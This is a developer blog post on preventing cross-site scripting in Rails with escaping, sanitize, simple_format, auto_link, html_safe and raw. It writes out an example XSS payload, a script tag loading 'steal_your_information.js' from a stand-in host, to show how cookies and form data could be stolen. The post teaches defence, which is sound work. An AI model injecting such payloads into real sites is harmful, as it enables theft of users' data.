Aug 2020
Rails Helpers that Help
When we build web applications, we’re happy when people use them.
Well, most of the time. The trouble is, some people misuse them. And robots, they always misuse them.
So we have to prepare for people and robots trying to break our nice things.
What could a bad actor do?
When we’re talking about a fairly standard web application, a user is presented with a form to tweet in, post in, comment in, whatever in.
When I type into the tweet form on twitter.com, my browser sends this text to Twitter’s database.
Then when you open twitter.com, your browser requests information from Twitter’s database, including my tweet text, to display.
Everything seems okay!
HTML
But what if, instead of typing
Here is something to be outraged about
I type
<h1>Here is something to be outraged about</h1>
If Twitter just displayed what I typed, your browser would interpret it as HTML, and render it as such.
Now, attempting to inject an <h1> is only a troll-level attempt at acting poorly. Let’s continue on to a more worthy adversary.
XSS
I could tweet
<script src="https://mysite.com/steal_your_information.js"></script>
When your browser interprets this as HTML, it will actually load steal_your_information.js from mysite.com.
Now you are pwned.
Your browser is running my JavaScript (XSS stands for Cross Site Scripting), so I can choose to steal your information (cookies, forms, etc.), or add things to your DOM and request that you give me new information.
Escaping
One preventative measure is to just render everything as text. In order to do this, we need to escape characters that look like HTML. So if you tweet
<script src="https://mysite.com/steal_your_information.js"></script>
Then that’s exactly what your followers will see.
No script is loaded, we just look at the HTML like it’s a painting.
The behind-the-scenes escaped version of that chunk of text looks like:
&lt;script src=&quot;https://mysite.com/steal_your_information.js&quot;&gt;&lt;/script&gt;
Instead of <, we see something like &lt;, which is an HTML Character Entity. I’ve rambled about HTML entities elsewhere on the blog if you’re curious.
If the characters weren’t escaped, the tweet would render as HTML, and nothing would be visible, because <script> tags are hidden in rendered HTML. But the JS would be running in the background 🙃.
Sanitizing
Another option is to clean up the user input before it’s displayed, allowing some HTML, and throwing out bad stuff.
So for example, if I tweet
Here’s a link to <a href="https://mysite.com">my website</a>
We want it to render with “my website” as a clickable link, rather than as the raw HTML text.
How to accomplish this stuff in Rails
Rails has a few built-in helpers that can get us on our way.
1. Do Nothing
Rails automatically escapes HTML in user generated content when it’s displayed in views!
If we need to be explicit, we can use the html_escape utility method.
It takes a string and escapes the HTML characters in it.
html_escape("<a>Link here</a>")
=> "&lt;a&gt;Link here&lt;/a&gt;"
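Here is a minimal sketch of the same escaping in plain Ruby, outside of a Rails view. It assumes the standard library's ERB::Util.html_escape, which Rails' html_escape builds on. The tweet variable is just the example string from earlier.

```ruby
require "erb"

# The malicious tweet from the XSS example above.
tweet = '<script src="https://mysite.com/steal_your_information.js"></script>'

# Replace the characters that matter in HTML (<, >, &, ", ') with entities.
escaped = ERB::Util.html_escape(tweet)

puts escaped
# → &lt;script src=&quot;https://mysite.com/steal_your_information.js&quot;&gt;&lt;/script&gt;
```

The browser shows the escaped string as text, so the script never loads.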
2. Sanitize
As we hinted at above, Rails’ sanitize method strips away dangerous HTML like <script>, <form>, and onclick, and allows safe HTML like <strong>, <a>, <img>, etc.
Let’s say our @post.body is:
Here's a <a href="http://google.com">link</a>.
<script src="bad.js"></script>
<img src="image.jpg" />
When we run sanitize(@post.body) in our view, the webpage shows the sentence with a clickable link, followed by the image. In the DOM, the <a> and <img> tags are present, and the <script> tag is gone.
So the good HTML renders as HTML, and allows us to input links and images.
The bad HTML is completely deleted before it even makes its way to the DOM.
Seems like a nice compromise if we want to allow our users to have some control. The sanitize method allows customization through its tags and attributes options, so we can specify which HTML tags and attributes we want to allow.
3. Simple_format
Rails’ simple_format(text) first sanitizes the text, and then respects the newlines of the text input.
This is most common in the case of a textarea, where a user might have newlines between text.
For a single newline, simple_format will add a <br> tag.
For multiple newlines, the surrounding text will be wrapped in <p> tags.
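To make the newline rules concrete, here is a rough plain-Ruby approximation. It is not Rails' implementation: rough_simple_format is a hypothetical name, and it escapes all HTML instead of sanitizing it, so the sketch can run without Rails. The exact whitespace around the <br /> tags may differ from what Rails emits.

```ruby
require "erb"

# Hypothetical stand-in for simple_format (assumption: escape instead of sanitize).
def rough_simple_format(text)
  # Normalize Windows/Mac line endings, then split on blank lines into paragraphs.
  paragraphs = text.gsub(/\r\n?/, "\n").split(/\n{2,}/).reject(&:empty?)

  paragraphs.map do |paragraph|
    # Escape the user's text, then turn each remaining single newline into a <br />.
    body = ERB::Util.html_escape(paragraph).gsub("\n", "<br />\n")
    "<p>#{body}</p>"
  end.join("\n\n")
end

puts rough_simple_format("First line\nSecond line\n\nNew paragraph")
# → <p>First line<br />
#   Second line</p>
#
#   <p>New paragraph</p>
```

In a real view you would just call simple_format(@post.body) and let Rails handle both the sanitizing and the tags.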
4. Auto_link
Auto_link used to be part of Rails core, but has since been moved to an external gem.
It hasn’t been updated since 2016, but still seems to work well in 2020.
This is useful when users will enter links, without marking them up with HTML. Let’s say you build a chat application, and a user types:
Hey did you see www.thiswebsite.com
As it stands, that link won’t be clickable when it renders in HTML, because no one told Rails that it’s a link. Having to copy and paste links is not fun in a web app, so auto_link will parse the text, and add <a> tags where necessary.
But before doing that, it will sanitize the text, just as we saw above.
Let’s say @post.body is:
Hey did you see www.thiswebsite.com. <script src="bad.js"></script>
auto_link(@post.body)
=> "Hey did you see <a href='http://www.thiswebsite.com'>www.thiswebsite.com</a>."
So, the non-link turned into a link, and the built-in sanitize removed the <script>.
And we can even combine this with simple_format if we’re working with textareas.
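If you're curious what "parse the text and add <a> tags" means in practice, here is a toy version in plain Ruby. Everything in it is an assumption for illustration: rough_auto_link and URL_PATTERN are made-up names, the regex is far simpler than what the gem uses, and it escapes the input instead of sanitizing it.

```ruby
require "erb"

# Hypothetical pattern: anything starting with http://, https://, or www.,
# up to the next whitespace, not ending in sentence punctuation.
URL_PATTERN = %r{(?:https?://|www\.)[^\s<]+[^\s<.,!?]}

# Hypothetical stand-in for auto_link (assumption: escape instead of sanitize).
def rough_auto_link(text)
  escaped = ERB::Util.html_escape(text)

  escaped.gsub(URL_PATTERN) do |match|
    # Bare www. links need a scheme to be usable as an href.
    href = match.start_with?("www.") ? "http://#{match}" : match
    %(<a href="#{href}">#{match}</a>)
  end
end

puts rough_auto_link("Hey did you see www.thiswebsite.com.")
# → Hey did you see <a href="http://www.thiswebsite.com">www.thiswebsite.com</a>.
```

The order matters: the user's text is neutralized first, and only then do we add our own trusted <a> tags around it.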
5. HTML_Safe or Raw
As we mentioned above, Rails automatically escapes all text before rendering in views. However, if we’re really careful, and want to override this behavior, we can use html_safe or raw:
html_safe is called on a string: "my string".html_safe
raw takes a string as its parameter: raw("my string")
Both methods render the HTML exactly as it came in from the user. If it isn’t already clear — this is dangerous! So, you should only use this if you have a clear idea of what strings are being used (likely not user input).
The main difference between the two is that html_safe will crash your app if your string is nil, with an undefined method 'html_safe' for nil:NilClass error. raw calls to_s on its argument first, so nil just becomes an empty string. So be careful there!
Conclusion
This post has concluded.